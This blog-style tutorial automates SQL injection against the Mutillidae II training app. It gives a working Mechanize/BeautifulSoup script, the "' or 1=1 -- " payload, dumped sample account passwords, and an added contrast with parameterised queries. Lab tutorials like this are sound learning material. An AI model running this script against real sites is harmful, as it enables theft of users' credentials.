Python is a great tool for automating things and making your life easier. Here I am going to show how to automate SQL injection using the Mechanize and BeautifulSoup Python packages. The target I am using is Mutillidae II. The link in my case is http://192.168.178.25/mutillidae/index.php?page=user-info.php. You may have a different local IP address.
#!/usr/bin/python
# Install the two packages first (run these in a shell, not inside the script):
#   pip install mechanize
#   pip install beautifulsoup4
from __future__ import print_function
import mechanize, sys
from bs4 import BeautifulSoup

br = mechanize.Browser()
br.open(sys.argv[1])                       # give the vulnerable link on the command line
br.select_form(nr=0)                       # select the first form
br.form['username'] = "' or 1=1 -- "       # inject our payload into the username field
br.submit()                                # submit the form
resp_html = br.response().read()           # read the response
soup = BeautifulSoup(resp_html, 'lxml')    # parse the HTML with the lxml parser (needs pip install lxml)
data_list = []                             # create an empty list
for item in soup.find_all('span'):         # iterate over the span tags and collect their text values
    data_list.append(item.get_text())
data_list = data_list[12:]                 # we are not interested in the data list up to index 11
count = 0
for item in data_list:                     # print six fields per line so the data looks pretty
    count += 1
    print(item, end=" ")
    if count % 6 == 0:
        print("")
In the terminal, run the Python script with the vulnerable link as its argument.
python script_name.py http://192.168.178.25/mutillidae/index.php?page=user-info.php
To understand this better, view the page source of the vulnerable page before and after the injection happens.
Username= admin Password= admin Signature= g0t r00t?
Username= adrian Password= somepassword Signature= Zombie Films Rock!
Username= john Password= monkey Signature= I like the smell of confunk
Username= jeremy Password= password Signature= d1373 1337 speak
Username= bryce Password= password Signature= I Love SANS
Username= samurai Password= samurai Signature= Carving fools
Username= jim Password= password Signature= Rome is burning
Username= bobby Password= password Signature= Hank is my dad
Username= simba Password= password Signature= I am a super-cat
Username= dreveil Password= password Signature= Preparation H
Username= scotty Password= password Signature= Scotty do
Username= cal Password= password Signature= C-A-T-S Cats Cats Cats
Username= john Password= password Signature= Do the Duggie!
Username= kevin Password= 42 Signature= Doug Adams rocks
Username= dave Password= set Signature= Bet on S.E.T. FTW
Username= patches Password= tortoise Signature= meow
Username= rocky Password= stripes Signature= treats?
Username= tim Password= lanmaster53 Signature= Because reconnaissance is hard to spell
Username= ABaker Password= SoSecret Signature= Muffin tops only
Username= PPan Password= NotTelling Signature= Where is Tinker?
Username= CHook Password= JollyRoger Signature= Gator-hater
Username= james Password= i<3devs Signature= Occupation: Researcher
Username= user Password= user Signature= User Account
Username= ed Password= pentest Signature= Commandline KungFu anyone?
Data for Noobs like me:
Install the Mechanize and BeautifulSoup Python packages and import the required libraries. Then open the vulnerable link, find the form, inject the payload into the username field and submit the form.
The link after submission looks like this: "http://192.168.178.25/mutillidae/index.php?page=user-info.php&username=%27+or+1%3D1+--+&password=&user-info-php-submit-button=View+Account+Details"
Fetch the response into the resp_html variable and parse it with the lxml parser. Then, with the help of BeautifulSoup, find the <span> tags (that is where our data lies). There are multiple ways to get this data; it all depends on your thinking. Maybe my way is longer than what you can come up with.

The first for loop iterates over the list of span tags to get their text. After that, I prune out the elements of the list up to index 11, as they are not of interest to us (see the page source after the injection). The second loop makes the data look more fancy.

The things we can do with this are limitless: we can use automation to check XSS, SQL injection, and all the other beautiful attacks that we use in web app pentesting. That's it, thank you for reading.
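Why the payload in the username field returns every account, and how a parameterised query stops it, as an added example that is not part of the original post or of Mutillidae (Mutillidae is PHP/MySQL; this uses Python and an in-memory SQLite table whose schema and rows are constructed to mirror the three fields the script prints):

```python
import sqlite3

# Constructed sample rows standing in for a training app's accounts table.
ACCOUNTS = [
    ("admin", "admin", "g0t r00t?"),
    ("adrian", "somepassword", "Zombie Films Rock!"),
    ("john", "monkey", "I like the smell of confunk"),
]
PAYLOAD = "' or 1=1 -- "   # the username value the script submits


def make_db():
    """In-memory SQLite database with a username/password/signature table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE accounts (username TEXT, password TEXT, signature TEXT)")
    con.executemany("INSERT INTO accounts VALUES (?, ?, ?)", ACCOUNTS)
    return con


def lookup_vulnerable(con, username, password):
    """String concatenation: the quote in the payload closes the literal,
    'or 1=1' makes the WHERE clause always true and '--' comments out the
    password check, so every row comes back."""
    sql = ("SELECT username, password, signature FROM accounts "
           "WHERE username='" + username + "' AND password='" + password + "'")
    return con.execute(sql).fetchall()


def lookup_parameterised(con, username, password):
    """Bound parameters: the payload is compared as plain text and matches
    no username, so the same input returns nothing."""
    sql = ("SELECT username, password, signature FROM accounts "
           "WHERE username=? AND password=?")
    return con.execute(sql, (username, password)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:    ", lookup_vulnerable(db, PAYLOAD, ""))
    print("parameterised: ", lookup_parameterised(db, PAYLOAD, ""))
```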